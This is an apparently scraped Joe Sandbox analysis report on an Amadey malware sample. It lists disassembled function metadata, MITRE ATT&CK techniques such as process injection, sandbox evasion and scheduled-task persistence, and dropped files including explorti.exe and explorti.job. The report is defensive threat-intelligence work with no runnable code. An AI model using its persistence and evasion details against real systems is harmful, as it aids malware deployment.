Instruction ID: abc0a55cba83a659f4df4b3744514deb12826216cea926dab9080cf599f3069f
Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction Fuzzy Hash: E0E0B672925238EBCB25DB988A44D8AF2ACEB49B50F554596B501D3251C270DF00C7D1

Function 00A12E20 Relevance: 17.9, APIs: 3, Strings: 7, Instructions: 434COMMON

Download Yara Rule

Strings

invalid stoi argument, xrefs: 00A1425A
246122658369, xrefs: 00A133D4
FAml, xrefs: 00A1378F
UFy=, xrefs: 00A133BA
Dy==, xrefs: 00A1369E
stoi argument out of range, xrefs: 00A14269
6JLUcxtnEx==, xrefs: 00A12EC7

Memory Dump Source

Source File: 00000007.00000002.2896017523.0000000000A01000.00000040.00000001.01000000.00000007.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000007.00000002.2895993515.0000000000A00000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896017523.0000000000A62000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896118697.0000000000A69000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000A6B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000CCA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000CFA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000D02000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896495970.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896648350.0000000000EAA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896664715.0000000000EAC000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a00000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID: 246122658369$6JLUcxtnEx==$Dy==$FAml$UFy=$invalid stoi argument$stoi argument out of range
API String ID: 0-3273830296
Opcode ID: 8c827c550984b874e1cd5b0eed9321c4bfb8a9d3c25baef6b500f1b8b72efb56
Instruction ID: 3a4ce644ae71684d356043487d0acf35fa6257bf21f51908a2ecd0caffd13492
Opcode Fuzzy Hash: 8c827c550984b874e1cd5b0eed9321c4bfb8a9d3c25baef6b500f1b8b72efb56
Instruction Fuzzy Hash: AA02CF71A00248EFEF14EFA8C949BDEBBB5EF05304F504558E805A7282D7759A85CFA1

Function 00A34770 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 148COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00A347A7
___except_validate_context_record.LIBVCRUNTIME ref: 00A347AF
_ValidateLocalCookies.LIBCMT ref: 00A34838
__IsNonwritableInCurrentImage.LIBCMT ref: 00A34863
_ValidateLocalCookies.LIBCMT ref: 00A348B8

Strings

csm, xrefs: 00A3484D

Memory Dump Source

Source File: 00000007.00000002.2896017523.0000000000A01000.00000040.00000001.01000000.00000007.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000007.00000002.2895993515.0000000000A00000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896017523.0000000000A62000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896118697.0000000000A69000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000A6B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000CCA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000CFA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000D02000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896495970.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896648350.0000000000EAA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896664715.0000000000EAC000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a00000_explorti.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 660dfd2d591620bb8a2b6044c1c1989fd4132a846914bc046dde8cfbfc66358b
Instruction ID: 293ac6a9b657363c106e578ee6d59bc9f38bd33ffd3045b89a35849b1b225f77
Opcode Fuzzy Hash: 660dfd2d591620bb8a2b6044c1c1989fd4132a846914bc046dde8cfbfc66358b
Instruction Fuzzy Hash: 8651A435A00248ABCF10DF68C885AAEBBB5BF49318F148195F8149B352D732FE55CB90

Function 00A370C9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 00A3710B

Strings

.exe, xrefs: 00A37118
.cmd, xrefs: 00A37129
.bat, xrefs: 00A3713A
.com, xrefs: 00A3714B

Memory Dump Source

Source File: 00000007.00000002.2896017523.0000000000A01000.00000040.00000001.01000000.00000007.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000007.00000002.2895993515.0000000000A00000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896017523.0000000000A62000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896118697.0000000000A69000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000A6B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000CCA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000CFA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000D02000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896495970.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896648350.0000000000EAA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896664715.0000000000EAC000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a00000_explorti.jbxd

Yara matches

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: dc0a46f866a20946e0a08f85ed3724e4b9b650b9f46e659692dffa0d344267c8
Instruction ID: 929f8fb9c69165b4b4caf5af75f6b606649267161e4b87cc8edaeb9f03374d18
Opcode Fuzzy Hash: dc0a46f866a20946e0a08f85ed3724e4b9b650b9f46e659692dffa0d344267c8
Instruction Fuzzy Hash: 9201FE7761861676663865199D0373F1799ABC3BB4F15012BFE44F73C2DF54DC0242A0

Function 00A02E80 Relevance: 7.8, APIs: 5, Instructions: 272COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00A02F1F
__Mtx_unlock.LIBCPMT ref: 00A02F8C
__Cnd_broadcast.LIBCPMT ref: 00A02FA3
__Mtx_unlock.LIBCPMT ref: 00A030B5
__Mtx_unlock.LIBCPMT ref: 00A0315B

Memory Dump Source

Source File: 00000007.00000002.2896017523.0000000000A01000.00000040.00000001.01000000.00000007.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000007.00000002.2895993515.0000000000A00000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896017523.0000000000A62000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896118697.0000000000A69000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000A6B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000CCA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000CFA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000D02000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896495970.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896648350.0000000000EAA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896664715.0000000000EAC000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a00000_explorti.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcast
String ID:
API String ID: 32384418-0
Opcode ID: 811fb20d4a3ad2d89ba89991eae9a1adbbdf83c1d2c18982bc36a625563e9741
Instruction ID: 4d32bfd75e1c01c2751d13e725f90f8ccbe891e13c95e04dfc24e1e7c0c2f767
Opcode Fuzzy Hash: 811fb20d4a3ad2d89ba89991eae9a1adbbdf83c1d2c18982bc36a625563e9741
Instruction Fuzzy Hash: 34A124B194130AAFDF11DF64D9457AAB7B8FF04364F008229E815D7281EB34EA54CBD1

Function 00A3C9B0 Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00A3CA37

Memory Dump Source

Source File: 00000007.00000002.2896017523.0000000000A01000.00000040.00000001.01000000.00000007.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000007.00000002.2895993515.0000000000A00000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896017523.0000000000A62000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896118697.0000000000A69000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000A6B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000CCA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000CFA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000D02000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896495970.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896648350.0000000000EAA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896664715.0000000000EAC000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a00000_explorti.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
Instruction ID: 61e66d836cd4941feb3ad1313832b66b34279e7f64ff0c3c6dfb387156b17059
Opcode Fuzzy Hash: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
Instruction Fuzzy Hash: 99B105329002859FDB15CF69CC817AEBBF5EF55360F1481AAF845BB342D6389D41CB60

Function 00A1BAA2 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 00A1BAFA
__Xtime_diff_to_millis2.LIBCPMT ref: 00A1BB14
_xtime_get.LIBCPMT ref: 00A1BB37
__Xtime_diff_to_millis2.LIBCPMT ref: 00A1BB43

Memory Dump Source

Source File: 00000007.00000002.2896017523.0000000000A01000.00000040.00000001.01000000.00000007.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000007.00000002.2895993515.0000000000A00000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896017523.0000000000A62000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896118697.0000000000A69000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000A6B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000CCA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000CFA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000D02000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896145299.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896495970.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896648350.0000000000EAA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2896664715.0000000000EAC000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a00000_explorti.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: b8aee1c6bebaa802e0236c054b0aa75ff96961f7a695fdb44b9535ae0f2c2fb5
Instruction ID: 369bb733056b007fa723caa9e9fa4bf89fa0d225e24dd8d5c399f9e9c48b1c59
Opcode Fuzzy Hash: b8aee1c6bebaa802e0236c054b0aa75ff96961f7a695fdb44b9535ae0f2c2fb5
Instruction Fuzzy Hash: 9C215175A41219AFDF10EFA4CD419FEBBB9EF08724F000069F601A7291DB34AD818BA1

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Amadey

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe

C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe:Zone.Identifier

C:\Users\user\AppData\Roaming\1000051000\2c422e6624.exe

C:\Windows\Tasks\explorti.job

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Windows Analysis Report
file.exe

Function 00A0BD60 Relevance: 17.8, APIs: 4, Strings: 6, Instructions: 310
networkfileCOMMON

Function 00A0E440 Relevance: 14.8, Strings: 11, Instructions: 1000
COMMON

Function 00A13550 Relevance: 51.5, APIs: 1, Strings: 28, Instructions: 761
COMMON

Function 00A05DF0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 364
COMMON

Function 00A07D00 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 392
COMMON

Function 00A36E01 Relevance: 4.6, APIs: 3, Instructions: 145
COMMON

Function 00A3D4F4 Relevance: 1.7, APIs: 1, Instructions: 198
COMMONLIBRARYCODE

Function 00A082B0 Relevance: 1.7, APIs: 1, Instructions: 159
COMMON

Function 00A08A60 Relevance: 1.6, APIs: 1, Instructions: 140
COMMON

Function 00A36C99 Relevance: 1.6, APIs: 1, Instructions: 89
COMMON

Function 00A36F71 Relevance: 1.6, APIs: 1, Instructions: 56
timeCOMMON

Function 00A3D6EF Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMON